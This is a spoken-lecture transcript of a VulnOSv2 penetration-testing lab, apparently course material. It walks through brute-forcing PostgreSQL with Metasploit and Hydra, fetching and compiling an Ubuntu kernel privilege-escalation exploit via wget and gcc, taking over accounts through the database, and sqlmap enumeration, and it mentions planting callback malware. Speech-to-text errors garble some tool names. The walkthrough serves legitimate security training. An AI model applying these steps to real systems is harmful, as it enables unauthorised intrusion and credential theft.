In the last part, that is the first part of the VulnOSv2 penetration testing case study, we have seen how to perform the web application penetration testing, web application browsing, then gaining the usernames and passwords, and how to use the SQL map. Then finally, how to break the passwords. These concepts we have seen in the last part. In this part, we are going to see the advanced concepts such as privilege escalation and gaining the access to the system and maintain the system for future usage. So these kind of things we are going to see in this part. Privilege escalation is the process of gaining the root access. In case of Linux, we will call it as root, where in case of Windows, we will call it as administrative privileges. It is not a straightforward activity always. So much patience is required, and you must be aware of various methods to perform this particular step. Privilege escalation can be done in multiple ways on trial and error basis. That means there is no straightforward approach. We cannot say that this approach will always guarantee you to break the root or to gain the root access. So few of them in achieving this root access are: first one is obtaining the passwords of users via password cracking tools that already we have seen in the last part. Performing brute force such as with the predefined word list such as dictionary based attacks, etc. Next one is searching for vulnerabilities of user database. In our case here it is a PostgreSQL system, and exploiting them with Metasploit. We are going to see now, okay, what are the database systems or database servers running on the vulnerable OSv2, and we'll try to identify is there any vulnerability present in that database server, and we'll use the Metasploit tool to exploit them. Next one is if not through database servers, that will go for identifying of the operating system vulnerabilities it presents. So in the third section, we are going for exploiting the operating system vulnerabilities. So in these three methods, we can gain the root access. Anyhow, we got the access of the user, that is webmin, but we have not have any uh, access to the admin user, that is vulnerable OS admin. So we are going to do these three tasks. Then we'll find out is there any way to enter into the root access. To perform this privilege escalation, first of all, we need to gain into the root access. To do this, first of all, we require an entry point. In this connection, first we'll examine is there any local service running on the vulnerable OS system or not. To do this, we'll use a command called netstat-antp. This will give us the system services that are running on the vulnerable OSv2 operating system. Anyhow, we are aware of the webmin password, so we'll enter into the vulnerable OSv2 operating system via SSH webmin at the rate 10.0.2.11, and let enter the webmin password as webmin 1980. Now we have logged into the vulnerable OSv2 operating system. From here, netstat-antp. So it will give you the list of services that are running on the vulnerable OSv2 operating system. So with which you can identify that is there any TCP services or any database services that are running on the vulnerable OSv2. Now the question to be answered is, note the services that are running on the corresponding ports and protocols. Are there any database services such as MySQL or PostgreSQL is running in the vulnerable OSv2? If you look at, there exists several services are running which are binded to the local host, and also some services that are running on the some ports like 6667, 80, 22, 5432. Here 22, 80, 6667 are the some other services, but 5432 is a service that will be binded with the that will be used by the PostgreSQL always. It is just like how the HTTP will work with the 8080 or 80 port. Like that, the PostgreSQL will use this service as 5432 to run the service 5432 as the port number. So with which we can answer this question like this particular we have observed the services in which 5432 is a port number which is usually used by the PostgreSQL and PostgreSQL listening port. So and we use this for connecting to the vulnerable OSv2's webmin user. To do this, open a terminal in Kali Linux and type the following command and enter the password webmin 1980 when prompted. Now I am coming out of this SSH, again relogging with the SSH. So SSH webmin @10.0.2.11 -L 5432 colon localhost colon 5432. That means we are going to trying to connect to the PostgreSQL service that is running on the vulnerable OSv2 with this command. And it will ask you for the password. Let you enter webmin 1980. Now it was connected to the vulnerable OSv2. After this connection, that will open another command prompt and we will open the Metasploit. To open the Metasploit, type msf console and enter. The msf console was opened now. Now we will focus on exploiting Postgres database service to exploit. To do this, select and set the payload and parameters as follows. We have seen in the Windows hacking, we have used the Windows payloads. Here we are supposed to use the Postgres payloads. First of all, we need to scan through the Postgres using Postgres payloads, checking for suitable logins. To do this, use this payload like use auxiliary /scanner /postgres _login. Now the Postgres related payloads are loaded. Now we'll check for the options that are available in this payload to set. Show options. There are various options are there. We are supposed to select some options from this, such as lhost and rhost kind of options. To do this, we need to set the rhost options, like set rhost as localhost, set rhost as localhost, that is 127.0.0.1. After setting the rhost, run. So here the exploitation was completed. Here login failed for various options that are provided here, but here login success. Here one login was success. It was attempted various logins. Among all these logins, this Postgres @template1 is the username with which login was successful. It means it will perform, that is our Metasploit payloads that what we have loaded will perform the brute force attack to log in the Postgres database with a pre-existing word list of username and passwords. Now the question to be answered is, have you identified suitable username and password Postgres? What is the username and password for the PostgreSQL? The username and password for the PostgreSQL it is already visible on the screen. That is Postgres @template1. So you make note of this username and password. Now we'll see the second method. If the method 1, that is just now what we have used, what we have done using Metasploit, that is method 1 is successful, then congratulations. Else follow the second method. Even though it is successful, try to follow the second method so that you can gain experience. In this method, we will use the existing password cracking tool called Hydra. To do this, we need to get word list from usernames and passwords that are available with Metasploit in Kali Linux. So we'll use this procedure. We'll log in with the SSH to the webmin the vulnerable OSv2 IP address. Once connected, we have already seen in the previous part that there exists a folder called Hydra. and let will go for exploring that particular Hydra, and by using that Hydra, we try to exploit the passwords or usernames and passwords that are available on the vulnerable OSv2. Open a new terminal and try to connect the webmin from the via SSH. Now we have connected to the webmin ls. We have seen post.tar.gz, cd post, that will see cd post, nothing was there, cler clear, and we'll follow the documentation that I have provided. The documentation consisting of, we should go to the home, then webmin, cd post, then /hydra -help. Now it is saying that Hydra is not found, but actually we are actually in the Hydra folder, and let will type ls and we'll see is there any files available. Yes, there are so many files available, but these are not compiled. So we should know how to compile it, and we need to how to run it. So in general, we'll use make to compile this. So type the command make. If the make command doesn't work, first you have to configure that. That is /configure. Then we need to go for make. Then all these files will be compiled. Then you will get a shell script file or the executable file kind of thing, where we can type /hydra space --help will give you the help information about the Hydra usage. Once you are done make, then make install. So it will try to install this Hydra. So the first step need to be done is /configure. Okay. Next step is make. Then afterwards, then sudo, sorry, not sudo here, make install. Then we'll go for typing of Hydra -help. So the Hydra help is giving you like this: the usage of the Hydra -l login file -p password, like that. Various options are available here, and an example was given here: Hydra -l username -p password list.txt, and you are supposed to give the URL with to which you are concentrating or which you are targeting to break the username and password. So it will show you list of options available to use with Hydra. Now get the word list from the Metasploit in the Kali to use with Hydra. We are aiming to crack PostgreSQL database server. The word list file can be located at /user/share/metasploit framework /data word list postgres_default.parse.txt. So then for that, what we are supposed to do is we should move to this folder in the Kali Linux from the command prompt. Now I have gone to the folder where the word lists are available. Now the word lists which are available here, what are the word lists are available here? This word list has to be taken to the vulnerable OSv2 operating system, and we need to use with the Hydra tool that was what we have compiled there, and with that tool we need to crack the password. So to do this, we'll run the simple HTTP server that was written in Python and which is available in the Kali Linux, like Python -m simple HTTP server, and port number is 80. It will start the simple HTTP server, and whenever the files will be made available and ready to use. So the word list folder from SSH terminal can be accessed. So go to the SSH terminal and get the Postgres default password.txt file via using wget. So wget is a command used for the getting of the content from the web. Now run the command python -m simple HTTP server. Now the HTTP server was started. We need to get the word list from the by using wget command on the from the vulnerable OSv2. Now we need to get the word list to the vulnerable OSv2. Further, we use wget command. The wget command will be used like this. That is wget http:// the IP address of the Kali Linux, then postgres hyphen underscore default underscore password.txt. So go to the SSH command prompt where we have opened that. From here, since it was logged in via SSH, it will see this was a login. No, this is not this one. This command prompt. This one also not login. This one we have done via command prompt. Here, using the wget http :/ the IP address of the Kali Linux, and we're going to download the postgres underscore default underscore path.txt. Then, whenever we use this command, the vulnerable OSv2 system connects to the Kali Linux and will download the text file, that is default path text file. And this text file we are supposed to use along with the Hydra tool to break the passwords. As it was shown here, we are supposed to use /hydra space -l postgres underscore default underscore path.txt. This command has to be used here to break the passwords or to get the username and password, which is belongs to the Postgres SQL. So it performed the brute force attack by using the word list that we have provided, but finally one of one target completed, 0 valid passwords found. With this, we are unable to find the passwords. So second method was failed for us in general. Anyhow, the first method was completed and we got the password. But if we do with the second method, we didn't get this. That means it's always in the trial and error basis that we are supposed to understand with this experimentation. Obtaining the root access is not straightforward. We need to practice various methods. At least from one method we will get success. Anyhow, with the first method we got the success. We did the second method, we didn't get it. That will try for some other methods. Now we'll go through the third method, exploiting the operating system vulnerabilities to escalate the privileges. However, the vulnerable OSv2 was built on the Ubuntu distribution. Let us check the vulnerabilities in Ubuntu 14.04. This step is like following other plan path to exploit the system by identifying the OS kernel related vulnerabilities. So from the SSH terminal that we have connected to the vulnerable OSv2, so type this command lsb underscore release -a. So after executing this command, we got that the distributor ID is Ubuntu, description is Ubuntu 14.04.4 long-term service LTS, and release is 14.04 release. Now we'll try to check for any vulnerabilities present with this version of the operating system. To do this, search for exploit available in Ubuntu 14.0.4.4 using such exploit. Just like how we did exploring of the vulnerability in the open document version 1.2.7 using such exploit, the same way we are supposed to do here. Let's use such exploit Ubuntu 14.04. It revealed several vulnerabilities. The first vulnerability is race condition privilege escalation, local privilege escalation, and various other vulnerabilities mentioned here. In this race condition privilege escalation is nothing but simultaneous login. That is, if we want to make simultaneous login, then this is to be race condition privilege escalation. Let we'll see one by one what are the possibilities with which we can exploit or explore the privileges. So it lists various exploits of Ubuntu 14.04 version. From available list, it explore 37292.c vulnerability for privilege escalation. Copy the exploit to prevent present working directory. That will copy it. Here, copy this 37292.c file to the current working directory, and we'll run the simple HTTP server with port 80 so that the simple HTTP server will start. This is simple HTTP server is a default server which is available with the Python 2 version. So whenever we run this, automatically the server will start, and the place from where you have typed the command, that is run the simple HTTP server, that folder will become the root folder, and via wget from anywhere you can use the IP address of the Kali Linux, and you can download the files which is available in the root folder. So that is the reason cp/user/share/exploit/db/ these are the files available. This is the file path of 37292.c file, and space dot means current working directory. Now this file is copied to the current working directory, and let will see that whether it is copied or not. ls, so 37292.c was copied here. Now what we'll do is we'll run the python-m simple http server 80. Now it is binded to the port 80. Now go to the vulnerable OS v2 from where you have connected this SSH. We'll go to this, and from there you will copy this cd post. From here we'll go for wget. Let's run the command wget http:// Kali Linux IP address /37292.c to download that C file into the vulnerable OS v2. Now we have downloaded this file. Once the download is over, then we are supposed to compile this and run it. So the compilation will be done via the C compiler, which is basically an inbuilt compiler in any Unix operating system. So the compiler will be like this: gcc space 37292.c space -o exploit. Now the exploit was created /exploit. It's just like a.out file. I have renamed as exploit. Once the exploit is done, then we'll run this. Here spanning threads, mount 1, mount 2, tail thread done, then preload created, and creating the shared library. Here the shared library is also created. So this will usually exploit the privileges, and now we have escalated to root. Let will see whether really we have escalated to root or not. Just by looking at the command symbol here, wherever the dollar is there, it is a normal user. Wherever hash is there, we can say it is a root user. We have already entered into the root. Congratulations. Just by exploiting it, we gone into the root. Let will see whether really we have gone into the root. IT. So ID has given that root is the user we have entered. That is, we can also say who am I. So the who am I command is returning URL root. Now we have escalated the privileges. That means the first method worked, second method unable to work because of the unavailability of the word list. Now third method, we have exploited the OS vulnerabilities, and with the exploiting of the OS vulnerability, we have gained the root access. Now we'll do some more operations on this. That is cd/root. Anyhow, we have entered into the root. That will say cd/root. Then there exists a file flag.txt file that will read the flag.txt. That means it is giving you hello and welcome. You successfully compromised the company, JABC and server completely. Congratulations. Hope you enjoy it. So this is the way how you are going to enter into the computer and cracking the computer, and thereby as a normal user you will enter, and thereby you are going to escalate the privileges to the root level or administrator level. Now you can go into the since you are a root user, you can go to the webmin user, and you can go to the post and make installation of the post, that is the Hydra tool. Then the Hydra tool will work under the root user. That means this will install the Hydra under the webmin user and the vulnerable OS system entire system can use this particular Hydra tool. So that means as a root user, whenever whatever the software or whatever the application that you install, that can be used by any other normal user. So in this way, you can plant any malware or any kind of malicious software, which will give the information about the target system to you in a periodic manner. Well, you can see the output. So here, whenever I run this cat flag.txt, that means it is giving you that, okay, you have successfully compromised the company JABC. We have followed the three methods, and in which two methods were successful, and we gained the username and password, and we have escalated the privileges to the root level, and we got the Postgres as the username and also Postgres as the password. That will try to go for identifying of the users of the Postgres command, and also we'll see is there any tables or databases available there. So for that, from the command prompt, you type psql -h localhost -u Postgres. So that means your host is localhost and user is Postgres. Whenever this command was asked, then it will ask you for prompting the password. Then password is Postgres. So here it entered into the Postgres command, and from here that will use the commands that I have mentioned in the document. That will go for checking of say help. So it will give you the help, and that is /h is for the help, /g is for the terminate with semicolon with execute query, and we'll go for -/c system. So now we have entered into the system. These are the PostgreSQL commands that we can use to enter into the system. Then system. Then afterwards, let will go for checking of the users. Select star from users. Here vulnerable OS admin, and the password is some chunk character was identified here. Now let will try to change this password. To change the password, we may use the update command. You should be cautious when you are setting the passwords like this, because this should be enclosed. Since it is a string, you should enclose it in single quotes. Vulnerable OS admin, and not only this one, but also for the password that what we are entering, it must be mentioned in a string format like this, semicolon colon. Now it is indicating the update one. That means one record is updated. That will check for users. Now the password was changed 123456. Now answer the question: is the password updated for the user vulnerable OS admin? Yes, the password is updated. Now let will try connecting the vulnerable OS admin from the via SSH command from the Kali Linux, and we'll see so that whenever we connect via admin user, then obviously the entire system is under our control. So open the command prompt here. Let me type SSH vulnerable OS admin at the rate. It will type the password 123456. So we got this problem because it was not updated in the vulnerable OS v2, because once you restart the vulnerable OS v2, this new password will be updated, will be used. While checking of the vulnerable OS v2 related PostgreSQL command, we find that okay, user vulnerable OS admin user's password is some jump characters that we have observed. We may use the same password to log in again. The reason is it will not work because we are supposed to restart the vulnerable OS v2 so that the password will be updated, and on the fly the password may not be updated. Okay, so for this we may try login with the old password that we have seen previously. That is, the old password is like this. Here you can get it here where we have connected to this. This is the old password. So let will copy this the password, and we'll try to connect via this SSH. So whenever it is prompted for password, let will paste this. So now it was connected because it is the old password. So still the old password is in use. Whenever the vulnerable OS v2 is restarted, then the new password will come into the picture. Once we connect to the vulnerable OS admin, that will browse is there any file available there. That will check is there any file available. So I have typed ls to list the files available. Here I find r00t, that is root.blend kind of file I found. So it is a blend file. That means you can open it and analyze with the help of Blender software. So the question asked here is what are the files and information displayed uh, there. That means there is a file called r00t.blend file. It is not possible to read or inspect from command prompt. Hence, try to bring this r00t.blend file to Kali Linux via wget. So for this, you are supposed to run the simple HTTP server, which is a default server. So for this, run the command in the vulnerable OS v2 as follows. Now use the Python -m simple HTTP server 8080. Now the HTTP server 8080 was started. We already know the vulnerable OS v2 operating system's IP address. We'll get this particular Blender file from the vulnerable OS v2 to the Kali Linux via wget. So for this, let will go to the command prompt. Here, let will open another command prompt. That will type wget http :/10.0.0 2.11 /r00t dot blend. Here we are supposed to use :8080. Well, we have downloaded this. Now we are supposed to have a software that is called Blender software to analyze this Blender file. So apt get install Blender. So we need to get some software like this. 82.4 MB software is required. So let's allow to install it. It will take some time. Now the Blender installation was completed. That will try opening the Blender and will try to analyze the root.blend file. Go to the search field and try to open the Blender file. So now the Blender was opened. Actually, Blender is a tool like our Adobe Photoshop kind of thing. That is where you can create some images, 3D images and all. So let's set up it and open the root.r00t.blend file. Let us try opening the file r00t.blend. After opening the file, we got some information in that image, that is b/2fg//drg. This image we find, just you use the selection tool and rotate this to get this information. So whenever you rotate this, you will get the information like this, that the password will be like this, ab12fg//drg. So this is the password will be prompted. Just observe this clearly. Here we got only, we're observing only B. Just to try tilting it, because it's a three-dimensional image that to be observed. So we are supposed to, even after performing the rotation, we got this B12FG like that we are identifying, but something was hidden here. That is the A. Okay, you try using this and you will find what here. This is A, and the password will look like this: ab12fg//drg. So this is the password. So you are supposed to make note of this password, and this is the password for the root. That is the root privileges, to obtain the complete root privileges. Here, vulnerable OS admin, we got it. Web admin password also we got it, and the core one, which is the root password, that also we obtained via this one. So let's try using SSH. Try to connect the root with this particular password. It will be asking you for password. Enter the password, that what we have seen in the image. Well, you see the command what we have changed here. The command prompt. You look at the command prompt. It is in hash. Previously with vulnerable OSv2 it is in dollar. So now you can do any task, anything that you want. So cat flag.txt, that will see. Well, fine, we have done it. So previously also we have done it. This is another way we did it and exploited the root. After knowing the information about the database, knowing about the usernames and passwords, cracking the passwords, after escalating the privileges, and knowing what are the other services running on the vulnerable OSv2, what else we can do? We can do some more things such as exploring the web applications, web servers, and database servers, and other privilege and related vulnerabilities. We can do it. So far, we tried exploring the vulnerabilities in step B using the Nikto tool. Then subsequently in step C, we have explored the various web application paths and URLs. Let us move in the same path to explore some more vulnerabilities that are present in the vulnerable OSv2 web application. And now we'll see some SQL injection attacks. Anyhow, using the SQL map, we identified that add underscore value is a parameter that is giving you a that is more vulnerable attribute with which you can perform the SQL injection attack. So one by one, what we'll do is we'll use these commands and we'll type on the. Now we'll try copying and pasting this each and every command, or you may type it also. Here you are supposed to give the vulnerable OSv2 operating system's IP address, then followed by slash JAPCT0CS slash ajax dot underscore udf dot php, and remaining and dollar whatever the commands were there, the same thing will inject it, and we'll try to know what is the content displayed by injecting these commands, and you are supposed to make note of this so that this information will be helpful for you to perform the remaining other database explosions that will be discussed later. Whenever the first command is injected using SQL map, then it is displaying what is meant by what is the backend that is used here. The backend is MySQL. Then we'll try injecting the remaining commands. Next, we try identifying the list of tables that are available in the database JABCD0CS. For this, run the second command. Then we'll come to know that here ODM underscore access underscore log. So these are the various tables that are available. Then we'll try applying the next SQL injection, and we'll come to know what are the user dumps that are available. In this, we know already that ODM underscore user is a is a play, is a table in which you will be finding all the users. So user dump, that will try entering this. So it is going to print the users and user related information. So here webmin was printed, and do you want to store the hashes and all? No, currently we don't require to store any hash because already we are aware of that. So this passwords were displayed here. These passwords were displayed in the MD5 hash format. Next, we try inserting some other commands like to know the privileges, user privileges. So at the end, once the same URL to be used. However, instead of this hyphen tables or hyphen DBS, we used to use privileges. We'll insert the privileges as a tag, and we'll come to know what are the privileges the users are having. This privilege is related information. It will take some time, and here we'll get the information related whether this particular user is having the root privileges or not. Still, it is finding various privileges that are available here. Here, create view, show view, view routine, create routine, drop, event, execute. So these are the database commands that particular webmin user is having. That means webmin user is having the privilege of accessing all these commands. So you can use any one of this command once you enter into the webmin user, and when you can directly communicate with the database with this particular commands. So it fetched all the commands that are having privilege to use. Then we'll try using other commands We'll try to get some column information. So in this database, what are the different columns available? That will fetch this column information. It will take some time to get the column information because it will retrieve each and every column. Total it was observed around resume 9 means total 9 columns. I hope it was observed, and it is checking for each and every column and its related information, that is including the data type. It is a varchar type or integer type or what type it is, it will retrieve. So far retrieved username, password, department, these are the column names it was identified, and every column name, what is the corresponding data type also displaying on the screen. Finally, it's shown the column names and corresponding data types. So let us try connecting this SSH webmin at the rate this one, and we know the password webmin 1980. Now it is connected to the vulnerable OSv2. That will use the commands ls-la. So it will give you the privileges that each and every file that is available in this folder. What are the various read options, write options, append options, different privileges that particular file is having. Then we'll print the passwords that are stored in this. That can be done via cat/etc/passwd. So here it is showing the passwords and its related information, like the passwords where these passwords were stored and its related information was shown here. Like this, you try using different commands. It was given in the document as I have given this. Now let will go for cd etc, because etc is a folder consisting of many services related files. So let will try using these services related files. So let will use like ls-la, so that we'll get the privileges that we can use with this. So actually all these are required root privileges to work with. Then we'll see any other thing that we can do. Any folders available in this? Do you find any folder in this? Here opt is there, which is a folder directory. Like that, any other folder available that let will look for. So here there is a folder called Drupal. So let will use this folder. We can try. You can check. Keep on checking remaining other folders also. So here cd druPal. So it consisting of some number here. What is this number actually? This is a folder actually again, cd7 ls. So here you will be having the Apache server related configuration script, apache2.conf, htaccess is a folder, sites is a folder. So whenever you know the configuration script, then we can manipulate the configuration script, and we can also see the permissions that we can use with so under cd7 instead of ls, that will do some more thing like ls-la, so which will give you the permissions with which you can access these files. So here read write permission is there for the apache2.conf. Like that, htaccess sites. So here sites is a directory, so which will start with D here, which is a directory, and these two are the files where you will be having the read write access. Like this, since the sites is directory, so let will move on to the directory cd sites ls. Here all and default, these two are the subfolders we'll find, and let will go to the defaults because it is a default HTML page that are kind of thing that we'll get in this particular folder. So let will see again ls-la, which will give you the accesses that we can use with. So here dbconfig.php is there, which is related to the database configuration, and settings.php, which is for the settings related thing information. And let will if you want to manipulate this, you can manipulate this cat db config dot php. So it will print the related information. Here the driver is MySQL, database is Drupal 7, and username is also Drupal 7. Password is tour, and host is localhost. So we come to know some information about this. So then we try connecting the database with this information. So how to connect this? MySQL is asking for the password. Actually, we are connecting the database Drupal 7 and with the user Drupal 7, and the password it is asking for is tour. So let will enter this. Now it is connected to the MySQL. So now directly we have connected to the MySQL server, and we can see database tables, and we can perform any type of manipulations from this. Show database. So it is showing the database like information underscore schema and Drupal 7. Okay. Use Drupal 7. Show tables. So here there are various tables available. All these tables are shown here. Now you can manipulate any one of these tables just placed here. In this way, we can manipulate any database table, any user, or you may also create a new user and you may assign an administrative privilege for that. So like that, you can perform any sort of thing, or you may also launch some vulnerabilities in this operating system. Just like how you got the this password list and other text files that via wget. In the same way, you will also get this particular malicious code and onto the target system and can execute from the target system to get the system compromise. So this is what the vulnerable OS v2 case study. To summarize, this case study started with the net discovery, that is network discovery. Then we have used net discover command. Also, we used nmap command for performing the scanning and enumeration related things. And in scanning, we identified the services, open ports, and many other things. Then we have gone for enumeration, where especially the services that are running on the target computer was identified, for which we have used the Nikto tool. Then we moved on to the identifying the or inspecting the source code of the web application. Then we have gone for searching for the directories that are available on the web application. And for that, we have used GoBuster and dir buster. Then we moved on to the searching for the folders. After searching the folders, we have gone for the pages. We have gone for inspecting of each and every page, the hrefs links, and many other things. Then we have gone for this JABC direct folder. Then there we identified that this web application is using Open Document. Then using such exploit, we have explored that is there any vulnerability available with the Open Document version 1.2.7. Then we identified whether there is a vulnerability. We have read that vulnerability, and that vulnerability is this one, that what we have identified. Using this vulnerability, we try to exploit this vulnerability with the help of SQL map. Via this SQL map, we explored various databases, tables, users, and its details. Then whenever we explored that, then we try to get the user information. The user information we got that two users are there, and with the MD5 hash form of the passwords, also we observed. Once we observed that, then we used John the Ripper, Hashcat, and we tried breaking the password. And finally, we went for the md5online.org/md5decrypt.html website. There we try to decrypt this. So there we got the webmin password as webmin 1980. Then we try connecting the SSH server, because in the nmap scanning we identified that SSH is open, port was open. So then we try connecting the SSH. Then afterwards we have gone for searching of the history and all the things. Then finally we have gone for what are the different users available in that vulnerable OS v2, and we identified that vulnerable OS admin is the administrative user. So we try exploring the administrative privileges. In the process of exploring or escalating the privileges from the normal user to the admin user, we have gone for three things. One is tracking via passwords. Second one is searching the vulnerabilities in the user databases. Then searching the vulnerabilities in the operating system. For that, we have taken the help of Metasploit, and we tried exploiting that. And via such exploit, we observed that not via such exploit, via Metasploit, we observed that this Postgres login payload can be used to exploit it. Then afterwards, we tried exploiting that, and finally we observed that this Postgres database default username and password is still using. So we try using this default username and password and try connecting to the webmin again via SSH. Then afterwards we try using the Hydra tool that is available on VulnOSv2. But with Hydra tool we are unable to crack the password or some passwords. So we tried the another method, that is checking the vulnerabilities in the operating system. Since the vulnerable OSv2 operating system built on the Ubuntu distribution, via using such exploit, we identified the vulnerability available in this. So this is the vulnerability with which we can exploit that. So that C programming file was copied onto the vulnerable OSv2 via wget. Then we try exploiting that. Then finally we got the root access. So once we got the root access, we are very happy and we gone back. Then we checked what are the different files available, and basically this is the webmin password, and we require root password. So hence we searched for any other file available, and fortunately we find a file called r00t.blend. So this particular file we brought back to the Kali Linux with the help of wget, and we installed the Blender software with which we identified the password of the root. Then we try making note of that root password, and we are trying connecting the root user via SSH and the password that we have obtained. Once it is done, then we try exploiting various other SQL injection commands, that what we can do with the help of SQL map. Then we identified various databases and tables, columns, and privileges that the webmin user can use. With the privileges, we entered into the webmin user to the vulnerable OSv2, and we started doing all these commands to know the information, and especially like database configuration information. Once you know the database configuration information, we directly try connecting the MySQL databases with the user as the DRUPAL, and database as the DRUPAL, and its password is TOOR. And finally, we have seen what are the databases available. So this is what the history of attacks that we have performed with the vulnerable OSv2. These are not only limited. You can, once you gain the system access, then you can do whatever you want. So this is the end of this particular vulnerable OSv2 case study. We will meet with some more case studies in future.